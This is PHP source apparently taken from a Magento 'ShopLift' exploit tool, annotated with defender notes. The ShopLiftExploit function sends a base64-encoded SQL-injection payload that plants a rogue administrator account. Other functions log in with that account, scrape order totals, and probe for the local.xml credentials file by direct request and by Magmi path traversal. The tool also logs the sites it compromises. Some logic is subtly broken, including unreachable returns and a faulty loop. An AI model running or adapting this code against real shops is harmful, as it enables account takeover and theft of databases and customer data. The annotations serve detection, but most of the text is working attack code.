- // Attempts to authenticate against the Magento Connect Manager ("/downloader/") with the
- // credentials held in $this->username / $this->password. CurlPost() is defined elsewhere in
- // the class and is assumed to return the response body as a string.
- //
- // Defender notes: the Connect Manager accepts the same credentials as the admin panel and
- // is rarely needed in production - remove it or deny it at the web server. A POST to
- // /downloader/ carrying "username"/"password" fields from an unexpected client, especially
- // right after a request to /admin/Cms_Wysiwyg/directive/index/, is a useful alert condition.
- //
- // @return string "Success\nPermission\t\t: Writeable|Denied" when the response contains
- //                "Log Out" or "Return to Admin", otherwise "Failed".
- private function LoginDownloader($url){
- $link = parse_url($url);
- // Only scheme and host are reused; any path on the supplied URL is discarded.
- $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
- array("username" => $this->username,
- "password" => $this->password)
- );
- // A logged-in Connect Manager page is recognised purely by these two banner strings.
- if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
- // Magento prints this warning when the web user cannot write to the install directory.
- $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
- return "Success\nPermission\t\t: ".$permission;
- $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
- return "Success\nSmtpPro\t\t: ".$smtp;
- $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
- return "Success\nFile system\t\t: ".$filesystem;
- } else {
- return "Failed";
- }
- }
- // Logs in to the Magento admin panel at the default "/admin/" path: fetches the login page,
- // scrapes the CSRF "form_key" hidden field, then POSTs login[username]/login[password] with it.
- // CurlPost() and GetStr() are defined elsewhere in the class.
- //
- // Defender notes: an admin session established from the same client that just hit
- // /admin/Cms_Wysiwyg/directive/index/ is a strong compromise indicator - correlate admin
- // login events with web-server logs for that path. Moving the admin panel off the default
- // "/admin/" URL, restricting it by source IP and requiring MFA all break this step.
- //
- // @return string Always starts with "Success"; carries the first <span class="price"> value
- //                from the post-login page and, when LocalFileDiscloure() returns something
- //                truthy, an "Instaled" line with that value.
- private function LoginAdmin($target){
- $link = parse_url($target);
- // First request is only used to harvest the form_key needed by the login POST.
- $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
- $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
- $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
- array("login[username]" => $this->username,
- "login[password]" => $this->password,
- "form_key" => $key)
- );
- // LocalFileDiscloure() is invoked twice here (once for the check, once for the value),
- // so a host that leaks app/etc/local.xml receives two extra requests for it.
- if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
- return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
- } else {
- return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
- }
- }
- // The injection step. Sends one POST to /admin/Cms_Wysiwyg/directive/index/ whose
- // base64-encoded "filter" parameter smuggles SQL that (1) inserts a new row into admin_user
- // with $this->username / $this->password and (2) inserts a matching admin_role row.
- // Success is inferred from the response decoding as an image.
- //
- // Defender notes (all values below are taken from the payload itself):
- //  - Web logs: any request to /admin/Cms_Wysiwyg/directive/index/ with "filter" and
- //    "___directive" parameters is suspicious; the path should not be reachable without an
- //    authenticated admin session once the vendor's fix for this issue is applied.
- //  - Database audit: admin_user rows whose email ends in "@telekpitekwashere.cok", whose
- //    firstname/lastname are "Firstname"/"Lastname", whose rp_token is NULL, or whose password
- //    is in the legacy "<md5>:rp" form (salt "rp"); admin_role rows with role_type 'U',
- //    role_name 'Firstname', parent_id 1 and tree_level 2 that staff did not create.
- //  - Response: remove unexpected admin accounts, rotate every admin credential and DB
- //    password (local.xml), and review orders/customers exported during the exposure window.
- //
- // @return bool true when the response body is accepted by imagecreatefromstring().
- private function ShopLiftExploit($target){
- // Pseudo-random local part for the planted account's e-mail; the domain is fixed (see payload).
- $email = substr(md5(time()),2,15);
- $link = parse_url($target);
- $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
- array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
- "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
- "forwarded" => "1")
- );
- // Success heuristic only; it says nothing about whether the INSERTs actually ran.
- return (@imagecreatefromstring($data) !== false);
- }
- // Orchestrates one run against $victim: normalises the URL to scheme://host (defaulting to
- // http://), runs ShopLiftExploit(), and on success also runs LoginDownloader() and
- // LoginAdmin(), appending a result banner to a local log file.
- //
- // Defender notes: the log file "ShopLift-<d-m-Y>.log" (append mode, current working
- // directory) is an on-disk artefact of the operator's host - worth searching for when
- // triaging a machine suspected of being used as a pivot. The result banner format
- // ("============[ShopLift Result]============") is a stable string for file scanning.
- //
- // @return string The result banner on success, or a timestamped "Not vuln !" line.
- private function ExecuteExploit($victim){
- // Opened before the target is even contacted, so the file exists even for non-vulnerable hosts.
- $file = fopen("ShopLift-".date("d-m-Y").".log","a");
- $url = parse_url($victim);
- // Bare hostnames are assumed to be plain http.
- $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
- if($this->ShopLiftExploit($target)){
- // Both follow-up logins reuse the credentials that ShopLiftExploit() just planted.
- $downloader = $this->LoginDownloader($target);
- $admin = $this->LoginAdmin($target);
- $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
- fwrite($file,$result);
- return $result;
- }else {
- return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
- }
- fclose($file);
- }
- // Probes for a readable Magento configuration file: first the direct path
- // /app/etc/local.xml, then via the Magmi importer's download_file.php with a "../" path.
- // A response containing both "install" and "date" is treated as the real local.xml and the
- // install date inside <date><![CDATA[...]]></date> is returned.
- //
- // Defender notes: local.xml contains the database credentials and encryption key, so a
- // successful hit here is a full data-store compromise. The web server must deny access to
- // app/etc/ (the stock .htaccess relies on AllowOverride being honoured - verify it), and the
- // Magmi web UI should not exist on a production host. Requests for
- // magmi/web/download_file.php with a "file=../" argument, or for /app/etc/local.xml directly,
- // are unambiguous alert conditions in access logs.
- //
- // @return string|false|null Install date on the first probe that matches, false when the
- //                           first probe does not match, null if the loop completes without
- //                           returning.
- private function LocalFileDiscloure($target){
- $path = array( "/app/etc/local.xml",
- "/magmi/web/download_file.php?file=../../app/etc/local.xml"
- );
- for($i=0;$i<=count($path);$i++){
- $test = $this->CurlPost($target.$path[$i]);
- // Two loose substring checks stand in for XML parsing.
- if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
- return $this->GetStr("<date><![CDATA[","]]></date>",$test);
- } else {
- return false;
- }
- }
- }